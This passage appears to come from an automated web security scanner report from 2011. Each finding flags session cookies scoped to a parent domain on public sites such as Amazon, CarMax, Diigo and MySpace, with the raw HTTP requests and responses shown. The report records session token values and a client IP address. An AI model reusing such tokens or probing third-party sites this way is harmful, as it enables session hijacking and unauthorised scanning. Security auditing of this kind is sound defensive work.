13.18. http://www.amazon.com/gp/site-directory/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/site-directory/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.19. http://www.amazon.com/music-rock-classical-pop-jazz/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/music-rock-classical-pop-jazz/b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=181-0349682-3421209; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /music-rock-classical-pop-jazz/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:26 GMT
Server: Server
x-amz-id-1: 1AWZZSHBMYQFXNK2TZN0
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XKxFVzH0piW6bh12P3jE4jVP61ZQQfn1i5c66cBPEQVMNGeFeEPIQFWJv/MdsXCT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=181-0349682-3421209; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.20. http://www.amazon.com/toys/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/toys/b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=186-2589969-2680600; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /toys/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:33 GMT
Server: Server
x-amz-id-1: 036W1XT31RW6BQB2XSMW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: kZWb7JrdWVARHF80ONC/A4r3Jr1hWDeGnSCm1H+YTMFGi/6Qk4MnrnFI1vNP5uxA
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-2589969-2680600; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.21. http://www.amazon.com/wishlist/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/wishlist/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=186-8078621-7036840; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wishlist/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:28 GMT
Server: Server
x-amz-id-1: 0Z3Y87WRFKJ1Q11M2G0K
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Ego3ck6jsiMYzZQy5mq4k0LI7SMs9DdekEwnw6kJ4wxR9tBB8EcVyWP5nD7nnlOe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-8078621-7036840; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16234

<html>
<head>

<style type="text/css"><!--

.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.22. http://www.amazon.com/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Server
x-amz-id-1: 0V0RKC4376K2YMDSV37C
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: A6zGDRGUjbMlYPxnk59HD10S5EjU04c0tVHuI5EisIW4w9Xtq+yRZhGulJQoodS8
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16197

<html>
<head>

<style type="text/css"><!--

.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.23. http://www.amazon.com/x22/x3e/x3cli previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/x22/x3e/x3cli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Server
x-amz-id-1: 0PCK2Z2XXY6R48VWHP5C
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: c5+vukLbuLrPzb9XbB4xNsX5E9P5pKl7cpikC6014m92Vy9HvsdHPJ1S4ooy8A74
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16197

<html>
<head>

<style type="text/css"><!--

.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.24. http://www.aspirationtech.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aspirationtech.org
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:09:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org
Last-Modified: Tue, 25 Jan 2011 14:09:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-C" lang="en-C">
<head>
<
...[SNIP]...

13.25. http://www.boats.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:57:15 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: JSESSIONID=b7lQLae-ucE5; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B0DFE48C52A7F5A;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Wed, 26-Jan-11 11:57:15 GMT;Path=/;Domain=.boats.com
X-SL-CompState: TouchUp

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

13.26. http://www.careersingear.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.careersingear.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.careersingear.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:49 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 29481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

13.27. http://www.carmax.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.carmax.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB052T0x0000000e_0xc6b22d1fCOIKM; expires=Mon, 24-Jan-2011 17:04:31 GMT; path=/
Connection: close
Date: Mon, 24 Jan 2011 16:04:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/
Set-Cookie: KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
Set-Cookie: KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>
CarMax - Browse used cars and new cars online
...[SNIP]...

13.28. http://www.diigo.com/post previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.diigo.com
Path:	/post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_smasher_session=cdc373a2e1ecd61c7b92bca1b0e323d3; domain=diigo.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 25 Jan 2011 13:14:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Location: https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost
X-Runtime: 0.00258
Content-Length: 142
Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Fri, 21 Jan 2011 09:14:38 GMT
Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Fri, 21 Jan 2011 09:14:38 GMT
Set-Cookie: _smasher_session=cdc373a2e1ecd61c7b92bca1b0e323d3; domain=diigo.com; path=/
Cache-Control: no-cache

<html><body>You are being <a href="https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost">redirected</a>.</body></html>

13.29. http://www.directstartv.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.30. https://www.isc.org/software/inn previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.isc.org
Path:	/software/inn

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.31. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.32. http://www.myspace.com/Modules/PostTo/Pages/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.myspace.com
Path:	/Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SessionDDF2=2xXsSLB0L/Krw+qh8vhTHCxfMhyIHxzrYDO28EaiUBPQMUu1i3A6r1xa3arh/mC2nMPd7rwv4zTXGXj6+HLj9g==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:55 GMT; path=/
MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988150464779&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:55 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: e33e7134e948ea36efc91ee918fd1313dbac0906ff7c9eb7
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988150464779&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:55 GMT; path=/
Set-Cookie: SessionDDF2=2xXsSLB0L/Krw+qh8vhTHCxfMhyIHxzrYDO28EaiUBPQMUu1i3A6r1xa3arh/mC2nMPd7rwv4zTXGXj6+HLj9g==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:55 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Keebler Elves
Date: Tue, 25 Jan 2011 04:46:54 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

13.33. http://www.myspace.com/netlingo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.myspace.com
Path:	/netlingo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Server: 53fa252345a87b39ff47aafb4ed7b2849b482ff947909977
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/
Set-Cookie: SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Chunk from Goonies
Date: Tue, 25 Jan 2011 04:46:51 GMT
Content-Length: 29349
X-Vertical: profileidentities

<!DOCTYPE html>
<html class="noJS en-US">
   
